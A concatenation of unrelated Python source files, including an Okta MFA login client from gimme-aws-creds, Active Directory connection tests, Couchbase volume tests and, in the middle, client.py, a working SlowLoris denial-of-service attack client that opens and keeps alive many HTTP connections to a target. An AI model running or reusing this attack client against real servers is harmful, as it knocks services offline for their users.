else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise errors.GimmeAWSCredsError("You must enroll in MFA before using this tool.", 2)
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'errorCode' in response_data:
if self.KEYRING_ENABLED:
try:
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
if factor['factorType'] is None:
# Prompt user for which Duo factor to use
raise duo.FactorRequired(id, state_token)
if factor['factorType'] == "passcode" and not passcode:
raise duo.PasscodeRequired(fid, state_token)
path = '/authn/factors/{fid}/verify'.format(fid=factor['id'])
data = {'fid': factor['id'],
'stateToken': state_token}
response = self._http_client.post(factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
sleep=2
while ret['status'] != 'SUCCESS':
self.ui.info("Waiting for MFA success...")
time.sleep(sleep)
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
links = response_data.get('_links')
response_data = self._http_client.post(links['next']['href'], data)
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
#return None
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ")
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# should be deprecated soon as OKTA move forward webauthN
# just for backward compatibility
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except:
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
response = {}
""" Authenticator """
verif = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
try:
client_data, assertion = verif.verify()
except:
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData':client_data, 'signatureData': signature_data, 'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_hs_stateToken(self, response):
# to test with user without MFA
state_token = None
saml_soup = BeautifulSoup(response.text, "html.parser")
# extract the stateToken from the Javascript code in the page and step up to MFA
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
state_token = decode(re.search(r"var stateToken = '(.*)';", response.text).group(1), "unicode-escape")
api_response = self.stepup_auth(None, state_token)
return api_response
# no MFA required => we should have a session cookies, login flow ends here
api_response = {
'status': 'SUCCESS',
'sessionToken': '',
'session': response.cookies['sid'],
'device_token': self._http_client.cookies['DT']
}
return api_response
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for inputtag in saml_soup.find_all('input'):
if inputtag.get('name') == 'SAMLResponse':
saml_response = inputtag.get('value')
elif inputtag.get('name') == 'RelayState':
relay_state = inputtag.get('value')
if saml_response is None:
# We didn't get a SAML response. Were we redirected to an MFA login page?
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
state_token = decode(re.search(r"var stateToken = '(.*)';", response.text).group(1), "unicode-escape")
api_response = self.stepup_auth(url, state_token)
saml_response = self.get_saml_response(url + '?sessionToken=' + api_response['sessionToken'])
return saml_response
raise RuntimeError(
'Did not receive SAML Response after successful authentication [' + url + ']')
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self.ui.input('Selection: ')
# make sure the choice is valid
if int(selection) > len(factors):
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[int(selection)]
@staticmethod
def _build_factor_name(factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
elif factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, offer to save the password
password = keyring.get_password(self.KEYRING_SERVICE, username)
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
if self.ui.input("Do you want to save this password in the keyring? (y/n) ") == 'y':
try:
keyring.set_password(self.KEYRING_SERVICE, username, password)
self.ui.info("Password for {} saved in keyring.".format(username))
except RuntimeError as err:
self.ui.warning("Failed to save password in keyring: " + str(err))
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
|
connection_test.py
|
import demistomock as demisto
from Active_Directory_Query import main
import socket
import ssl
from threading import Thread
import time
import os
import pytest
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
mocker.patch.object(demisto, 'params',
return_value=BASE_TEST_PARAMS)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('server_ip') == '127.0.0.1'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_bad_ssl(mocker):
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '185.199.108.153' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = 443
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
demisto_info_mock = mocker.patch.object(demisto, "info")
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' in err_msg
# call_args_list holds all calls (we need the first) with a tuple of args list and kwargs
info_msg = demisto_info_mock.call_args_list[0][0][0]
# ip is not in the certificate. so it should fail on host match
assert "doesn't match any name" in info_msg
def ssl_bad_socket_server(port):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# cert and keyfile generated with
# openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
try:
context.load_cert_chain('cert.pem', 'key.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind(('127.0.0.1', port))
sock.listen(5)
with context.wrap_socket(sock, server_side=True) as ssock:
try:
conn, addr = ssock.accept()
except ssl.SSLError as err:
if 'TLSV1_ALERT_UNKNOWN_CA' in str(err):
# all is ok. client refused our cert
return
raise
conn.recv(32)
msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
for x in range(10):
msg += msg
conn.send(msg)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
except Exception as ex:
pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex))
raise
def test_faulty_server(mocker):
port = 9638
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['unsecure'] = True
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_ssl_custom_cert(mocker, request):
ENV_KEY = 'SSL_CERT_FILE'
os.environ[ENV_KEY] = 'cert.pem'
def cleanup():
os.environ.pop(ENV_KEY)
request.addfinalizer(cleanup)
port = 9637
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' not in err_msg
|
client.py
|
"""This module implements the SlowLoris client."""
import threading
import time
from .connection import LorisConnection
from .user_agent import get_random_user_agent
class LorisClient:
"""SlowLoris attack client."""
def __init__(self):
self.targets = []
self.keepalive_thread = threading.Thread(target=self.keep_alive)
self.keepalive_thread.setDaemon(True)
self.keepalive_thread.start()
def attack(self, target):
"""Starts the attack."""
self.targets.append(target)
print("[{}] Initializing {} connections.".format(target.host, target.count))
# Start 'count' connections and send the initial HTTP headers.
for i in range(target.count):
conn = LorisConnection(target, True).send_headers(get_random_user_agent())
target.connections.insert(0, conn)
if i == target.count - 1:
print("[{}] All connections initialized.".format(target.host))
def stop(self):
"""Stops the attack."""
for target in self.targets:
print("[{}] Shutting down all connections.".format(target.host))
for conn in target.connections:
conn.close()
def keep_alive(self):
"""Keeps all targets alive and maintains their connections."""
while True:
time.sleep(5)
# Iterate over all targets.
for target in self.targets:
self.keep_target_alive(target)
def keep_target_alive(self, target):
"""Keeps a target alive and maintains its connections."""
# Print latest latency.
latency = target.get_latency()
if latency != None:
print("[{}] Current latency: {:.2f} ms".format(target.host, latency))
connection_count = len(target.connections)
# Every 10 seconds, send HTTP nonsense to prevent the connection from timing out.
for i in range(0, connection_count):
try:
target.connections[i].keep_alive()
# If the server closed one of our connections,
# re-open the connection in its place.
except: # pylint: disable=bare-except
# Notify the user that the host started dropping connections
# if this connection was the first one being dropped.
if target.dropped_connections == 0:
print("[{}] Server started dropping connections.".format(target.host))
target.dropped_connections += 1
# Notify the user about the amount of reconnections.
threshold = 10
if target.reconnections >= threshold:
print("[{}] Reconnected {} dropped connections."
.format(target.host, target.reconnections))
target.reconnections = 0
# Reconnect the socket.
conn = LorisConnection(target).send_headers(get_random_user_agent())
if conn.is_connected:
target.connections[i] = conn
target.reconnections += 1
|
volume.py
|
from threading import Thread
import threading
from lib.testconstants import STANDARD_BUCKET_PORT
from couchbase_helper.document import DesignDocument, View
from basetestcase import BaseTestCase
from rebalance.rebalance_base import RebalanceBaseTest
from membase.api.rest_client import RestConnection, RestHelper
class VolumeTests(BaseTestCase):
def setUp(self):
super(VolumeTests, self).setUp()
self.zone = self.input.param("zone", 1)
self.recoveryType = self.input.param("recoveryType", "full")
self.ddocs = []
self.default_view_name = "upgrade-test-view"
self.ddocs_num = self.input.param("ddocs-num", 0)
self.view_num = self.input.param("view-per-ddoc", 2)
self.is_dev_ddoc = self.input.param("is-dev-ddoc", False)
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 10000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "pillowfight")
self.instances = self.input.param("instances", 1)
self.node_out = self.input.param("node_out", 0)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to",False)
self.reload_size = self.input.param("reload_size",50000)
self.initial_load= self.input.param("initial_load",10000)
def tearDown(self):
super(VolumeTests, self).tearDown()
def load(self, server, items, bucket,start_at=0,batch=1000):
import subprocess
from lib.testconstants import COUCHBASE_FROM_SPOCK
rest = RestConnection(server)
num_cycles = int((items / batch )) / 5
cmd = "cbc-pillowfight -U couchbase://{0}/{3} -I {1} -m 10 -M 100 -B {2} --populate-only --start-at {4} --json".format(server.ip, items, batch,bucket,start_at)
if rest.get_nodes_version()[:5] in COUCHBASE_FROM_SPOCK:
cmd += " -u Administrator -P password"
self.log.info("Executing '{0}'...".format(cmd))
rc = subprocess.call(cmd, shell=True)
if rc != 0:
self.fail("Exception running cbc-pillowfight: subprocess module returned non-zero response!")
def check_dataloss(self, server, bucket, num_items):
from couchbase.bucket import Bucket
from couchbase.exceptions import NotFoundError,CouchbaseError
from lib.memcached.helper.data_helper import VBucketAwareMemcached
self.log.info("########## validating data for bucket : {} ###########".format(bucket))
cb_version= cb_version = RestConnection(server).get_nodes_version()[:3]
if cb_version < "5":
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name),timeout=5000)
else:
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name),username=server.rest_username,
password=server.rest_password,timeout=5000)
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
batch_start = 0
batch_end = 0
batch_size = 10000
errors = []
while num_items > batch_end:
batch_end = batch_start + batch_size
keys = []
for i in xrange(batch_start, batch_end, 1):
keys.append(str(i).rjust(20, '0'))
try:
bkt.get_multi(keys)
self.log.info("Able to fetch keys starting from {0} to {1}".format(keys[0], keys[len(keys) - 1]))
except CouchbaseError as e:
self.log.error(e)
ok, fail = e.split_results()
if fail:
for key in fail:
try:
bkt.get(key)
except NotFoundError:
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append("Missing key: {0}, VBucketId: {1}".
format(key, vBucketId))
batch_start += batch_size
self.log.info("Total missing keys:{}".format(len(errors)))
self.log.info(errors)
return errors
def create_ddocs_and_views(self):
self.default_view = View(self.default_view_name, None, None)
for bucket in self.buckets:
for i in xrange(int(self.ddocs_num)):
views = self.make_default_views(self.default_view_name, self.view_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
self.ddocs.append(ddoc)
for view in views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket)
def test_volume_with_rebalance(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items,b)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
new_server_list=self.servers[0:self.nodes_init]
for t in load_thread:
t.join()
self.sleep(30)
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items,b,self.num_items)))
for t in load_thread:
t.start()
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*2)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b,self.num_items*2)))
for t in load_thread:
t.start()
#rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init]+ servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out=[self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init,[],
servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
